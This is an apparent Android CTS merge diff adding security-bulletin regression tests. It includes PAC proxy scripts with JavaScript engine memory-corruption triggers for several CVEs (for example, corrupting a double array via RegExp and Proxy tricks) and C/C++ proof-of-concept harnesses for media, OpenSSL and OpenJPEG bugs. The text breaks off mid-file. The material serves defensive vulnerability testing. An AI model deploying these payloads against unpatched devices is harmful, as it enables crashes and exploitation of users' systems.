Merge "Fix CTS failed when publish device capabilities." am: 833b4a1ed4 am: 4ead793229
Original change: https://android-review.googlesource.com/c/platform/cts/+/1649976
Change-Id: I982c604455e46bda94438c4078ee2413787aa8d4
diff --git a/apps/hotspot/AndroidManifest.xml b/apps/hotspot/AndroidManifest.xml
index 277be5f..fd8b045 100644
--- a/apps/hotspot/AndroidManifest.xml
+++ b/apps/hotspot/AndroidManifest.xml
@@ -5,6 +5,7 @@
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
+ <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<application>
<activity android:name=".MainActivity">
<intent-filter>
diff --git a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java
index 2e0ed87..eb81563 100644
--- a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java
+++ b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java
@@ -16,5 +16,11 @@
ActivityCompat.requestPermissions(
this, new String[] {Manifest.permission.ACCESS_COARSE_LOCATION}, 2);
}
+
+ if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION)
+ != PackageManager.PERMISSION_GRANTED) {
+ ActivityCompat.requestPermissions(
+ this, new String[] {Manifest.permission.ACCESS_FINE_LOCATION}, 2);
+ }
}
}
diff --git a/hostsidetests/appsecurity/Android.bp b/hostsidetests/appsecurity/Android.bp
index 4aaddd9..b0626d4 100644
--- a/hostsidetests/appsecurity/Android.bp
+++ b/hostsidetests/appsecurity/Android.bp
@@ -43,7 +43,7 @@
test_suites: [
"cts",
"general-tests",
- "mts",
+ "mts-documentsui",
"sts",
],
diff --git a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java
index 1da1202..eef1577 100644
--- a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java
+++ b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java
@@ -93,6 +93,7 @@
private Intent getHttpIntent() {
Intent i = new Intent(Intent.ACTION_VIEW);
i.addCategory(Intent.CATEGORY_BROWSABLE);
+ i.addCategory(Intent.CATEGORY_DEFAULT);
i.setData(Uri.parse("http://com.android.cts.intent.receiver"));
return i;
}
diff --git a/hostsidetests/scopedstorage/Android.bp b/hostsidetests/scopedstorage/Android.bp
index 9c9043c..7406fcb 100644
--- a/hostsidetests/scopedstorage/Android.bp
+++ b/hostsidetests/scopedstorage/Android.bp
@@ -79,7 +79,7 @@
name: "CtsScopedStorageHostTest",
srcs: ["host/src/**/*.java"],
libs: ["tradefed", "testng"],
- test_suites: ["general-tests", "mts", "cts"],
+ test_suites: ["general-tests", "mts-mediaprovider", "cts"],
test_config: "AndroidTest.xml",
}
diff --git a/hostsidetests/securitybulletin/Android.bp b/hostsidetests/securitybulletin/Android.bp
index 2b1a50c..39f7eda 100644
--- a/hostsidetests/securitybulletin/Android.bp
+++ b/hostsidetests/securitybulletin/Android.bp
@@ -40,11 +40,12 @@
compile_multilib: "both",
multilib: {
lib32: {
- suffix: "32",
+ suffix: "_sts32",
},
lib64: {
- suffix: "64",
+ suffix: "_sts64",
},
+ // build/soong/common/arch.go default returns nil; no default possible
},
arch: {
arm: {
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index a6b5c79..bd55c9b 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -27,7 +27,6 @@
<target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
<option name="cleanup-apks" value="true" />
- <option name="test-file-name" value="OomCatcher.apk" />
<option name="test-file-name" value="MainlineModuleDetector.apk" />
<option name="test-file-name" value="hotspot.apk" />
</target_preparer>
diff --git a/hostsidetests/securitybulletin/res/cve_2015_6616.mp4 b/hostsidetests/securitybulletin/res/cve_2015_6616.mp4
new file mode 100644
index 0000000..716c942
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2015_6616.mp4
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2017_0726.mp4 b/hostsidetests/securitybulletin/res/cve_2017_0726.mp4
new file mode 100644
index 0000000..2e30e91
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2017_0726.mp4
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2019_2046.pac b/hostsidetests/securitybulletin/res/cve_2019_2046.pac
new file mode 100644
index 0000000..82ef431
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2019_2046.pac
@@ -0,0 +1,27 @@
+function FindProxyForURL(url, host){
+ const f = eval(`(function f(i) {
+ if (i == 0) {
+ class Derived extends Object {
+ constructor() {
+ super();
+ ${"this.a=1;".repeat(0x3fffe-8)}
+ }
+ }
+
+ return Derived;
+ }
+
+ class DerivedN extends f(i-1) {
+ constructor() {
+ super();
+ ${"this.a=1;".repeat(0x40000-8)}
+ }
+ }
+
+ return DerivedN;
+ })`);
+
+ let a = new (f(0x7ff))();
+ a;
+ return "DIRECT";
+}
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0224.pac b/hostsidetests/securitybulletin/res/cve_2020_0224.pac
new file mode 100644
index 0000000..6b8f689
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0224.pac
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+function gc() {
+ for (let i = 0; i < 0x10; i++)
+ new ArrayBuffer(0x800000);
+}
+function to_dict(obj) {
+obj.__defineGetter__('x',()=>2);
+obj.__defineGetter__('x',()=>2);
+}
+function fk() {
+rgx = null;
+dbl_arr = [1.1, 2.2, 3.3, 4.4];
+o = {};
+o.__defineGetter__("length", ()=> {
+ rgx = new RegExp(/AAAAAAAA/y);
+ return 2;
+ });
+o[0] = "aaaa";
+o.__defineGetter__(1, ()=> {
+ for (let i=0;i<8;i++) dbl_arr.push(5.5);
+
+ let cnt = 0;
+ rgx[Symbol.replace]("AAAAAAAA", {
+ toString: ()=> {
+ cnt++;
+ if (cnt == 2) {
+ rgx.lastIndex = {valueOf: ()=> {
+ to_dict(rgx);
+ gc();
+ return 0;
+ }};
+
+ }
+
+ return 'BBBB$';
+ }
+ });
+ return "bbbb";
+ });
+p = new Proxy( {}, {
+ ownKeys: function(target) {
+ return o;
+ },
+ getOwnPropertyDescriptor(target, prop) {
+ return {configurable: true, enumerable: true, value: 5};
+ }
+ });
+
+Object.keys(p);
+alert (dbl_arr[0]);
+if (dbl_arr[0] == 1.1) {
+ fail("failed to corrupt dbl_arr");
+}
+}
+
+function FindProxyForURL(url, host) {
+fk();
+return "DIRECT";
+}
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0381.info b/hostsidetests/securitybulletin/res/cve_2020_0381.info
new file mode 100644
index 0000000..510c136
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0381.info
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0381.xmf b/hostsidetests/securitybulletin/res/cve_2020_0381.xmf
new file mode 100644
index 0000000..cbe4bbc
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0381.xmf
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.info b/hostsidetests/securitybulletin/res/cve_2020_0383.info
new file mode 100644
index 0000000..175c47c
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0383.info
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.xmf b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf
new file mode 100644
index 0000000..921efe1
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0384.info b/hostsidetests/securitybulletin/res/cve_2020_0384.info
new file mode 100644
index 0000000..e74b507
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0384.info
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0384.xmf b/hostsidetests/securitybulletin/res/cve_2020_0384.xmf
new file mode 100644
index 0000000..5056ce3
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0384.xmf
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0385.info b/hostsidetests/securitybulletin/res/cve_2020_0385.info
new file mode 100644
index 0000000..f0d0459
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0385.info
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0385.xmf b/hostsidetests/securitybulletin/res/cve_2020_0385.xmf
new file mode 100644
index 0000000..6437f9e
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0385.xmf
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/hostsidetests/securitybulletin/res/cve_2021_0393.pac
similarity index 66%
copy from tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
copy to hostsidetests/securitybulletin/res/cve_2021_0393.pac
index f32aa90..42038b61 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
+++ b/hostsidetests/securitybulletin/res/cve_2021_0393.pac
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2020 The Android Open Source Project
+ * Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -13,14 +13,10 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
-package android.security.cts;
-import android.content.Context;
-
-public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider {
-
- @Override
- public boolean onCreate() {
- return true;
- }
+function FindProxyForURL(url, host) {
+ let s = String.fromCharCode(0x4141).repeat(0x10000001) + "A";
+ s = "'" + s + "'";
+ eval(s);
+ return "DIRECT";
}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/hostsidetests/securitybulletin/res/cve_2021_0396.pac
similarity index 66%
rename from tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
rename to hostsidetests/securitybulletin/res/cve_2021_0396.pac
index f32aa90..5677445 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
+++ b/hostsidetests/securitybulletin/res/cve_2021_0396.pac
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2020 The Android Open Source Project
+ * Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -13,14 +13,11 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
-package android.security.cts;
-import android.content.Context;
-
-public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider {
-
- @Override
- public boolean onCreate() {
- return true;
- }
+function FindProxyForURL(url, host){
+ var evil_call = eval("(function(" + Array(65535).fill("x").join(",") + "){})");
+ f(evil_call());
+ return "DIRECT";
}
+
+function f(){}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp
index 891c7ad..5817588 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp
@@ -30,9 +30,6 @@
"frameworks/av/media/libmedia/include",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
shared_libs: [
"libstagefright",
@@ -41,7 +38,6 @@
"libstagefright_foundation",
"libdatasource",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/Android.bp
new file mode 100644
index 0000000..b4b0c1a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/Android.bp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2015-6616",
+
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+
+ srcs: [
+ "poc.cpp",
+ ],
+
+ include_dirs: [
+ "frameworks/av/media/libdatasource/include",
+ "frameworks/av/media/libstagefright/include",
+ "cts/hostsidetests/securitybulletin/securityPatch/includes",
+ ],
+
+ shared_libs: [
+ "libstagefright",
+ "libutils",
+ "libmedia",
+ "libdatasource",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/poc.cpp
new file mode 100644
index 0000000..8d175cc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/poc.cpp
@@ -0,0 +1,105 @@
+/**
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <dlfcn.h>
+#include <sys/types.h>
+#include <media/DataSource.h>
+#include <datasource/FileSource.h>
+#include <media/stagefright/MediaExtractor.h>
+#include <android/IMediaExtractor.h>
+#include <media/stagefright/DataSourceBase.h>
+#include <media/stagefright/MetaData.h>
+#include "../includes/common.h"
+#define LIBNAME "/system/lib64/extractors/libmp4extractor.so"
+#define LIBNAME_APEX "/apex/com.android.media/lib64/extractors/libmp4extractor.so"
+
+void * operator new(size_t size) {
+ if (size > 64 * 1024 * 1024) {
+ exit (EXIT_VULNERABLE);
+ }
+ return malloc(size);
+}
+
+using namespace android;
+
+int main(int argc, char **argv) {
+ (void) argc;
+ (void) argv;
+#if _64_BIT
+ GetExtractorDef getDef = nullptr;
+ if (argc < 2) {
+ return EXIT_FAILURE;
+ }
+
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp < DataSource > dataSource = new FileSource(argv[1]);
+ if (dataSource == nullptr) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ void* creator = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+ float confidence;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ creator = (void*) getDef().u.v2.sniff(dataSource->wrap(), &confidence,
+ &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ creator = (void*) getDef().u.v3.sniff(dataSource->wrap(), &confidence,
+ &meta, &freeMeta);
+ }
+ if (!creator) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ CMediaExtractor *ret = ((CreatorFunc) creator)(dataSource->wrap(), meta);
+ if (ret == nullptr) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ if (meta != nullptr && freeMeta != nullptr) {
+ freeMeta(meta);
+ }
+
+ MediaExtractorCUnwrapper *mediaExtractorCUnwrapper =
+ new MediaExtractorCUnwrapper(ret);
+ MediaTrack* source = mediaExtractorCUnwrapper->getTrack(0);
+ if (source == nullptr) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ source->start();
+
+ dlclose(libHandle);
+#endif /* _64_BIT */
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp
new file mode 100644
index 0000000..282e6b3
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2016-2182",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libcrypto",
+ "libssl",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp
new file mode 100644
index 0000000..78e1e73
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp
@@ -0,0 +1,138 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <dlfcn.h>
+#include <string.h>
+#include <openssl/ssl.h>
+#include <openssl/crypto.h>
+#include <openssl/bn.h>
+#include <memory>
+#include "../includes/common.h"
+
+/** NOTE: These values are for the BIGNUM declared in kBN2DecTests and */
+/** must be updated if kBN2DecTests is changed. */
+#if _32_BIT
+#define ALLOCATION_SIZE 52
+static const int sMallocSkipCount[] = {1,0};
+#else
+#define ALLOCATION_SIZE 56
+static const int sMallocSkipCount[] = {0,0};
+#endif
+
+static const char *kTest =
+ "123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890";
+
+static int sCount = 0;
+static bool sOverloadMalloc = false;
+int loopIndex = 0;
+
+template<typename T>
+struct OpenSSLFree {
+ void operator()(T *buf) {
+ OPENSSL_free(buf);
+ }
+};
+
+using ScopedOpenSSLString = std::unique_ptr<char, OpenSSLFree<char>>;
+
+namespace crypto {
+template<typename T, void (*func)(T*)>
+struct OpenSSLDeleter {
+ void operator()(T *obj) {
+ func(obj);
+ }
+};
+
+template<typename Type, void (*Destroyer)(Type*)>
+struct OpenSSLDestroyer {
+ void operator()(Type* ptr) const {
+ Destroyer(ptr);
+ }
+};
+
+template<typename T, void (*func)(T*)>
+using ScopedOpenSSLType = std::unique_ptr<T, OpenSSLDeleter<T, func>>;
+
+template<typename PointerType, void (*Destroyer)(PointerType*)>
+using ScopedOpenSSL =
+std::unique_ptr<PointerType, OpenSSLDestroyer<PointerType, Destroyer>>;
+
+struct OpenSSLFree {
+ void operator()(uint8_t* ptr) const {
+ OPENSSL_free(ptr);
+ }
+};
+
+using ScopedBIGNUM = ScopedOpenSSL<BIGNUM, BN_free>;
+using ScopedBN_CTX = ScopedOpenSSLType<BN_CTX, BN_CTX_free>;
+} // namespace crypto
+
+static int DecimalToBIGNUM(crypto::ScopedBIGNUM *out, const char *in) {
+ BIGNUM *raw = nullptr;
+ int ret = BN_dec2bn(&raw, in);
+ out->reset(raw);
+ return ret;
+}
+
+void* (*realMalloc)(size_t) = nullptr;
+
+void mtraceInit(void) {
+ realMalloc = (void *(*)(size_t))dlsym(RTLD_NEXT, "malloc");
+ return;
+}
+
+void *malloc(size_t size) {
+ if (realMalloc == nullptr) {
+ mtraceInit();
+ }
+ if (!sOverloadMalloc) {
+ return realMalloc(size);
+ }
+ if (size == ALLOCATION_SIZE) {
+ if (sCount >= sMallocSkipCount[loopIndex]) {
+ return nullptr;
+ }
+ ++sCount;
+ }
+ return realMalloc(size);
+}
+
+using namespace crypto;
+
+int main() {
+ CRYPTO_library_init();
+ ScopedBN_CTX ctx(BN_CTX_new());
+ if (!ctx) {
+ return EXIT_FAILURE;
+ }
+ for(loopIndex = 0; loopIndex < 2; ++loopIndex) {
+ ScopedBIGNUM bn;
+ int ret = DecimalToBIGNUM(&bn, kTest);
+ if (!ret) {
+ return EXIT_FAILURE;
+ }
+ sOverloadMalloc = true;
+ ScopedOpenSSLString dec(BN_bn2dec(bn.get()));
+ sOverloadMalloc = false;
+ if (!dec) {
+ return EXIT_FAILURE;
+ }
+ if (strcmp(dec.get(), kTest)) {
+ return EXIT_FAILURE;
+ }
+ }
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp
index dbf4cb2..bf03223 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp
@@ -43,10 +43,6 @@
"android.hidl.allocator@1.0",
"android.hardware.media.omx@1.0",
],
- suffix: "32",
- },
- lib64: {
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp
new file mode 100644
index 0000000..cb2f6bd
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2016-8332",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.c",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ shared_libs: [
+ "libpdfium",
+ ],
+ include_dirs: [
+ "external/pdfium/third_party/libopenjpeg20",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c
new file mode 100644
index 0000000..86cbaec
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c
@@ -0,0 +1,141 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <string.h>
+#include <stdlib.h>
+#include "openjpeg.h"
+#include "opj_includes.h"
+
+#define REPEATVALUES 100000
+
+unsigned char gStartValues[] = { 0xFF, 0x4F, 0xFF, 0x51, 0x00, 0x2F, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x2E,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x07, 0x01,
+ 0x01, 0x07, 0x01, 0x01, 0x07, 0x01, 0x01, 0xFF, 0x64, 0x00, 0x23, 0x00,
+ 0x01, 0x43, 0x72, 0x65, 0x61, 0x74, 0x6F, 0x72, 0x3A, 0x20, 0x4A, 0x61,
+ 0x73, 0x50, 0x65, 0x72, 0x20, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E,
+ 0x20, 0x31, 0x2E, 0x37, 0x30, 0x30, 0x2E, 0x31, 0xFF, 0x52, 0x00, 0x0C,
+ 0x00, 0x00, 0x00, 0x01, 0x01, 0x05, 0x04, 0x04, 0x00, 0x01, 0xFF, 0x5C,
+ 0x00, 0x13, 0x40, 0x40, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48,
+ 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0xFF, 0x5D, 0x00, 0x14, 0x01,
+ 0x40, 0x40, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48,
+ 0x48, 0x50, 0x48, 0x48, 0x50, 0xFF, 0x5D, 0x00, 0x14, 0x02, 0x40, 0x40,
+ 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50,
+ 0x48, 0x48, 0x50 };
+unsigned int gNumStartValues = sizeof(gStartValues) / sizeof(gStartValues[0]);
+
+unsigned char gRepeatValues[] = { 0xFF, 0x75, 0x00, 0x09, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00 };
+unsigned int gNumRepeatValues = sizeof(gRepeatValues)
+ / sizeof(gRepeatValues[0]);
+
+unsigned char gLastValues[] = { 0xFF, 0x75, 0x00, 0x09, 0x00, 0x00, 0x01, 0x00,
+ 0x00, 0x00, 0x00 };
+unsigned int gNumLastValues = sizeof(gLastValues) / sizeof(gLastValues[0]);
+
+typedef struct {
+ char* blob;
+ ssize_t blobSize;
+ ssize_t readPos;
+} applicationContext;
+
+opj_stream_t* allocate_stream(void) {
+ opj_stream_private_t * stream = NULL;
+
+ stream = (opj_stream_private_t*) opj_calloc(1, sizeof(opj_stream_private_t));
+ if (!stream) {
+ return NULL;
+ }
+
+ stream->m_buffer_size = OPJ_J2K_STREAM_CHUNK_SIZE;
+ stream->m_stored_data = (OPJ_BYTE *) opj_malloc(OPJ_J2K_STREAM_CHUNK_SIZE);
+ if (!stream->m_stored_data) {
+ opj_free(stream);
+ return NULL;
+ }
+
+ stream->m_current_data = stream->m_stored_data;
+ stream->m_status |= OPJ_STREAM_STATUS_INPUT;
+ stream->m_opj_skip = opj_stream_read_skip;
+ stream->m_opj_seek = opj_stream_read_seek;
+ stream->m_read_fn = opj_stream_default_read;
+ stream->m_write_fn = opj_stream_default_write;
+ stream->m_skip_fn = opj_stream_default_skip;
+ stream->m_seek_fn = opj_stream_default_seek;
+
+ return (opj_stream_t *) stream;
+}
+
+static OPJ_SIZE_T ReadHandler(void *buffer, OPJ_SIZE_T length, void *context) {
+ applicationContext* appContext = (applicationContext*) context;
+ ssize_t count = 0;
+ ssize_t rem = 0;
+ if (!appContext) {
+ return ((OPJ_SIZE_T) - 1);
+ }
+ rem = appContext->blobSize - appContext->readPos;
+ if ((ssize_t) length <= rem) {
+ count = length;
+ } else {
+ count = rem;
+ }
+ memcpy(buffer, &appContext->blob[appContext->readPos], count);
+ appContext->readPos += count;
+ return ((OPJ_SIZE_T) length);
+}
+
+int main(void) {
+ ssize_t offset = 0;
+ unsigned int count = 0;
+ applicationContext sContext;
+ opj_j2k_t* codec = NULL;
+ opj_stream_t* stream = NULL;
+ opj_image_t* image = NULL;
+ opj_stream_private_t* private = NULL;
+ opj_event_mgr_t eventMgr;
+ stream = allocate_stream();
+ private = (opj_stream_private_t*)stream;
+
+ sContext.blobSize = gNumStartValues + REPEATVALUES * gNumRepeatValues
+ + gNumLastValues;
+ sContext.blob = (char*) opj_malloc(sContext.blobSize);
+ if (!sContext.blob) {
+ return EXIT_FAILURE;
+ }
+ memset(sContext.blob, 0, sContext.blobSize);
+
